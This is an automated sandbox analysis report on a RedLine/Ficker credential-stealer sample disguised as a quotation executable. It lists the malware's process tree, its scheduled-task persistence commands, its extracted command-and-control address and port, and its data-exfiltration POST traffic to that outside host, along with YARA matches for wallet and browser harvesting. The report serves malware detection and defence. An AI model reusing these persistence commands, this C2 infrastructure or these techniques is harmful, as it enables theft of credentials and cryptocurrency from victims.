Windows Analysis Report
QUOTATION 061622.exe

Overview

General Information

Sample Name: QUOTATION 061622.exe
Analysis ID: 647019
MD5: c2c0094c2e70379101d9704808838355
SHA1: 9a492aa61c6f36f17b296c075c26ec6c82c0f72d
SHA256: 3e962de98112837b963063e4db6a41ecfe2d50efc98a5cdf87bcd98fdb1af145
Tags: exe, RedLineStealer

Detection

Ficker Stealer, RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Multi AV Scanner detection for submitted file
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Yara detected Ficker Stealer
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Machine Learning detection for sample
Allocates memory in foreign processes
Binary or sample is protected by dotNetProtector
Injects a PE file into a foreign processes
Yara detected Generic Downloader
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Found many strings related to Crypto-Wallets (likely being stolen)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Enables debug privileges
Is looking for software installed on the system
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • QUOTATION 061622.exe (PID: 5992 cmdline: "C:\Users\user\Desktop\QUOTATION 061622.exe" MD5: C2C0094C2E70379101D9704808838355)
    • vbc.exe (PID: 6472 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe MD5: B3A917344F5610BEEC562556F11300FA)
      • conhost.exe (PID: 1096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 5828 cmdline: "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • schtasks.exe (PID: 3444 cmdline: schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f MD5: 15FF7D8324231381BAD48A052F85DF04)
    • cmd.exe (PID: 5952 cmdline: cmd" /c copy "C:\Users\user\Desktop\QUOTATION 061622.exe" "C:\Users\user\AppData\Roaming\Data\Data.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • Data.exe (PID: 4224 cmdline: C:\Users\user\AppData\Roaming\Data\Data.exe MD5: C2C0094C2E70379101D9704808838355)
    • vbc.exe (PID: 5108 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe MD5: B3A917344F5610BEEC562556F11300FA)
      • conhost.exe (PID: 5036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 3856 cmdline: "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • schtasks.exe (PID: 5212 cmdline: schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f MD5: 15FF7D8324231381BAD48A052F85DF04)
    • cmd.exe (PID: 5140 cmdline: cmd" /c copy "C:\Users\user\AppData\Roaming\Data\Data.exe" "C:\Users\user\AppData\Roaming\Data\Data.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • Data.exe (PID: 6324 cmdline: C:\Users\user\AppData\Roaming\Data\Data.exe MD5: C2C0094C2E70379101D9704808838355)
  • cleanup
{"C2 url": ["185.222.58.90:17910"], "Bot Id": "Lxx"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
dump.pcap | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security

Source | Rule | Description | Author | Strings
00000015.00000002.692582557.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
00000015.00000002.692582557.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000005.00000000.471969251.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
00000005.00000000.471969251.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000005.00000002.572983809.00000000076CF000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security

Source | Rule | Description | Author | Strings
14.2.Data.exe.36a1f70.1.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
14.2.Data.exe.36a1f70.1.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
14.2.Data.exe.36a1f70.1.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
  • 0xe68a:$u7: RunPE
  • 0x11d41:$u8: DownloadAndEx
  • 0x7330:$pat14: , CommandLine:
  • 0x11279:$v2_1: ListOfProcesses
  • 0xe88b:$v2_2: get_ScanVPN
  • 0xe92e:$v2_2: get_ScanFTP
  • 0xf61e:$v2_2: get_ScanDiscord
  • 0x1060c:$v2_2: get_ScanSteam
  • 0x10628:$v2_2: get_ScanTelegram
  • 0x106ce:$v2_2: get_ScanScreen
  • 0x11416:$v2_2: get_ScanChromeBrowsersPaths
  • 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths
  • 0x11709:$v2_2: get_ScanBrowsers
  • 0x117ca:$v2_2: get_ScannedWallets
  • 0x117f0:$v2_2: get_ScanWallets
  • 0x11810:$v2_3: GetArguments
  • 0xfed9:$v2_4: VerifyUpdate
  • 0x147e6:$v2_4: VerifyUpdate
  • 0x11bca:$v2_5: VerifyScanRequest
  • 0x112c6:$v2_6: GetUpdates
  • 0x147c7:$v2_6: GetUpdates
21.0.vbc.exe.400000.0.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
21.0.vbc.exe.400000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security

No Sigma rule has matched
No Snort rule has matched

                        AV Detection

                        Source: QUOTATION 061622.exe | Virustotal: Detection: 44%
                        Source: QUOTATION 061622.exe | ReversingLabs: Detection: 48%
                        Source: http://185.222.58.90:17910/ | Avira URL Cloud: Label: malware
                        Source: http://185.222.58.90:17910 | Avira URL Cloud: Label: malware
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exe | ReversingLabs: Detection: 48%
                        Source: QUOTATION 061622.exe | Joe Sandbox ML: detected
                        Source: 5.2.vbc.exe.400000.0.unpack | Malware Configuration Extractor: RedLine {"C2 url": ["185.222.58.90:17910"], "Bot Id": "Lxx"}
                        Source: QUOTATION 061622.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: QUOTATION 061622.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                        Networking

                        Source: unknown | Network traffic detected: HTTP traffic on port 49780 -> 17910
                        Source: unknown | Network traffic detected: HTTP traffic on port 17910 -> 49780
                        Source: unknown | Network traffic detected: HTTP traffic on port 49849 -> 17910
                        Source: unknown | Network traffic detected: HTTP traffic on port 17910 -> 49849
                        Source: unknown | Network traffic detected: HTTP traffic on port 49859 -> 17910
                        Source: unknown | Network traffic detected: HTTP traffic on port 17910 -> 49859
                        Source: unknown | Network traffic detected: HTTP traffic on port 49915 -> 17910
                        Source: unknown | Network traffic detected: HTTP traffic on port 17910 -> 49915
                        Source: unknown | Network traffic detected: HTTP traffic on port 49917 -> 17910
                        Source: unknown | Network traffic detected: HTTP traffic on port 17910 -> 49917
                        Source: unknown | Network traffic detected: HTTP traffic on port 49918 -> 17910
                        Source: unknown | Network traffic detected: HTTP traffic on port 17910 -> 49918
                        Source: Yara match | File source: 21.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 21.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.QUOTATION 061622.exe.3851f70.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 21.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 21.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 21.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 5.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 5.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 21.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 14.2.Data.exe.368a150.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 14.2.Data.exe.36a1f70.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.QUOTATION 061622.exe.383a150.2.raw.unpack, type: UNPACKEDPE
                        Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/Endpoint/CheckConnect" | Host: 185.222.58.90:17910 | Content-Length: 137 | Expect: 100-continue | Accept-Encoding: gzip, deflate | Connection: Keep-Alive
                        Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings" | Host: 185.222.58.90:17910 | Content-Length: 144 | Expect: 100-continue | Accept-Encoding: gzip, deflate
                        Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment" | Host: 185.222.58.90:17910 | Content-Length: 1105566 | Expect: 100-continue | Accept-Encoding: gzip, deflate
                        Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/Endpoint/GetUpdates" | Host: 185.222.58.90:17910 | Content-Length: 1105558 | Expect: 100-continue | Accept-Encoding: gzip, deflate
                        Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment" | Host: 185.222.58.90:17910 | Content-Length: 1105829 | Expect: 100-continue | Accept-Encoding: gzip, deflate
                        Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/Endpoint/GetUpdates" | Host: 185.222.58.90:17910 | Content-Length: 1105821 | Expect: 100-continue | Accept-Encoding: gzip, deflate | Connection: Keep-Alive
                        Source: global traffic | TCP traffic: 192.168.2.5:49780 -> 185.222.58.90:17910
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.222.58.90
                        Source: vbc.exe, 00000005.00000002.572915187.0000000007681000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696862310.0000000006E21000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.698007004.000000000723C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697046954.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://185.222.58.90:17910
                        Source: vbc.exe, 00000005.00000002.572915187.0000000007681000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696862310.0000000006E21000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://185.222.58.90:17910/
                        Source: vbc.exe, 00000005.00000002.573067688.0000000007711000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://185.222.58.90:179100
                        Source: vbc.exe, 00000015.00000002.697046954.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://185.222.58.90:17910X
                        Source: vbc.exe, 00000015.00000002.695886074.00000000010DE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ns.adobe.c/g
                        Source: vbc.exe, 00000015.00000003.679261338.000000000C631000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ns.adobe.c/gr
                        Source: vbc.exe, 00000005.00000002.573067688.0000000007711000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697164052.0000000006F85000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/
                        Source: vbc.exe, 00000005.00000002.572915187.0000000007681000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696862310.0000000006E21000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                        Source: vbc.exe, 00000015.00000002.696919861.0000000006E6F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                        Source: vbc.exe, 00000005.00000002.572983809.00000000076CF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696919861.0000000006E6F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/D
                        Source: vbc.exe, 00000005.00000002.572915187.0000000007681000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696862310.0000000006E21000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                        Source: vbc.exe, 00000005.00000002.572915187.0000000007681000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696862310.0000000006E21000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                        Source: vbc.exe, 00000005.00000002.572915187.0000000007681000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696862310.0000000006E21000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                        Source: vbc.exe, 00000005.00000002.572915187.0000000007681000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696862310.0000000006E21000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: vbc.exe, 00000015.00000002.696919861.0000000006E6F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697046954.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/
                        Source: vbc.exe, 00000005.00000002.573067688.0000000007711000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.572915187.0000000007681000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696862310.0000000006E21000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/0
                        Source: vbc.exe, 00000005.00000002.572915187.0000000007681000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696862310.0000000006E21000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                        Source: vbc.exe, 00000005.00000002.572915187.0000000007681000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696862310.0000000006E21000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                        Source: vbc.exe, 00000005.00000002.572983809.00000000076CF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.572915187.0000000007681000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696862310.0000000006E21000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696919861.0000000006E6F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                        Source: vbc.exe, 00000005.00000002.572915187.0000000007681000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696862310.0000000006E21000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                        Source: vbc.exe, 00000015.00000002.697046954.0000000006EB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                        Source: vbc.exe, 00000005.00000002.573067688.0000000007711000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/GetUpdates0
                        Source: vbc.exe, 00000005.00000002.572915187.0000000007681000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696862310.0000000006E21000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                        Source: vbc.exe, 00000015.00000002.698007004.000000000723C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697248055.0000000006FFA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                        Source: vbc.exe, 00000005.00000002.572915187.0000000007681000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696862310.0000000006E21000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                        Source: vbc.exe, 00000015.00000002.696862310.0000000006E21000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentX
                        Source: vbc.exe, 00000005.00000002.572915187.0000000007681000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentme0
                        Source: vbc.exe, 00000005.00000002.572915187.0000000007681000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696862310.0000000006E21000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                        Source: vbc.exe, 00000005.00000002.572915187.0000000007681000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696862310.0000000006E21000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                        Source: vbc.exe, 00000005.00000002.572983809.00000000076CF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.696919861.0000000006E6F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/t_
                        Source: vbc.exe, 00000005.00000002.573337691.0000000007825000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.573780220.0000000007A27000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.580618835.000000000BB51000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.574018688.0000000007AF1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697578487.000000000708D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697970804.000000000720F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.704639232.000000000BE21000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.698300479.00000000073A6000.00000004.00000800.00020000.00000000.sdmp, tmpC52C.tmp.5.dr, tmp31D7.tmp.5.dr, tmpCB41.tmp.21.dr, tmp6032.tmp.21.dr, tmp2EB7.tmp.5.dr, tmp2F83.tmp.5.dr, tmp870.tmp.5.dr, tmp6A58.tmp.5.dr, tmp21C5.tmp.5.dr, tmp686D.tmp.21.dr, tmp30DC.tmp.5.dr, tmp2D4F.tmp.5.dr, tmpEFE7.tmp.5.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                        Source: vbc.exe, vbc.exe, 00000005.00000000.471969251.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000000.471695644.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Data.exe, 0000000E.00000002.582345521.000000000368A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.692582557.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000000.565186728.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Data.exe, 0000001F.00000002.695577674.000000000393A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                        Source: vbc.exe | String found in binary or memory: https://api.ipify.orgcoo
                        Source: vbc.exe, vbc.exe, 00000005.00000000.471969251.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000000.471695644.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Data.exe, 0000000E.00000002.582345521.000000000368A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.692582557.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000000.565186728.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Data.exe, 0000001F.00000002.695577674.000000000393A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                        Source: vbc.exe, 00000005.00000002.573337691.0000000007825000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.573780220.0000000007A27000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.580618835.000000000BB51000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.574018688.0000000007AF1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697578487.000000000708D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697970804.000000000720F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.704639232.000000000BE21000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.698300479.00000000073A6000.00000004.00000800.00020000.00000000.sdmp, tmpC52C.tmp.5.dr, tmp31D7.tmp.5.dr, tmpCB41.tmp.21.dr, tmp6032.tmp.21.dr, tmp2EB7.tmp.5.dr, tmp2F83.tmp.5.dr, tmp870.tmp.5.dr, tmp6A58.tmp.5.dr, tmp21C5.tmp.5.dr, tmp686D.tmp.21.dr, tmp30DC.tmp.5.dr, tmp2D4F.tmp.5.dr, tmpEFE7.tmp.5.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                        Source: vbc.exe, 00000005.00000002.573337691.0000000007825000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.573780220.0000000007A27000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.580618835.000000000BB51000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.574018688.0000000007AF1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697578487.000000000708D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697970804.000000000720F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.704639232.000000000BE21000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.698300479.00000000073A6000.00000004.00000800.00020000.00000000.sdmp, tmpC52C.tmp.5.dr, tmp31D7.tmp.5.dr, tmpCB41.tmp.21.dr, tmp6032.tmp.21.dr, tmp2EB7.tmp.5.dr, tmp2F83.tmp.5.dr, tmp870.tmp.5.dr, tmp6A58.tmp.5.dr, tmp21C5.tmp.5.dr, tmp686D.tmp.21.dr, tmp30DC.tmp.5.dr, tmp2D4F.tmp.5.dr, tmpEFE7.tmp.5.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
                        Source: vbc.exe, 00000005.00000002.573337691.0000000007825000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.573780220.0000000007A27000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.580618835.000000000BB51000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.574018688.0000000007AF1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697578487.000000000708D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697970804.000000000720F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.704639232.000000000BE21000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.698300479.00000000073A6000.00000004.00000800.00020000.00000000.sdmp, tmpC52C.tmp.5.dr, tmp31D7.tmp.5.dr, tmpCB41.tmp.21.dr, tmp6032.tmp.21.dr, tmp2EB7.tmp.5.dr, tmp2F83.tmp.5.dr, tmp870.tmp.5.dr, tmp6A58.tmp.5.dr, tmp21C5.tmp.5.dr, tmp686D.tmp.21.dr, tmp30DC.tmp.5.dr, tmp2D4F.tmp.5.dr, tmpEFE7.tmp.5.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                        Source: vbc.exe, 00000005.00000002.573337691.0000000007825000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.573780220.0000000007A27000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.580618835.000000000BB51000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.574018688.0000000007AF1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697578487.000000000708D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697970804.000000000720F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.704639232.000000000BE21000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.698300479.00000000073A6000.00000004.00000800.00020000.00000000.sdmp, tmpC52C.tmp.5.dr, tmp31D7.tmp.5.dr, tmpCB41.tmp.21.dr, tmp6032.tmp.21.dr, tmp2EB7.tmp.5.dr, tmp2F83.tmp.5.dr, tmp870.tmp.5.dr, tmp6A58.tmp.5.dr, tmp21C5.tmp.5.dr, tmp686D.tmp.21.dr, tmp30DC.tmp.5.dr, tmp2D4F.tmp.5.dr, tmpEFE7.tmp.5.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: vbc.exe, vbc.exe, 00000005.00000000.471969251.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000000.471695644.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Data.exe, 0000000E.00000002.582345521.000000000368A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.692582557.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000000.565186728.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Data.exe, 0000001F.00000002.695577674.000000000393A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
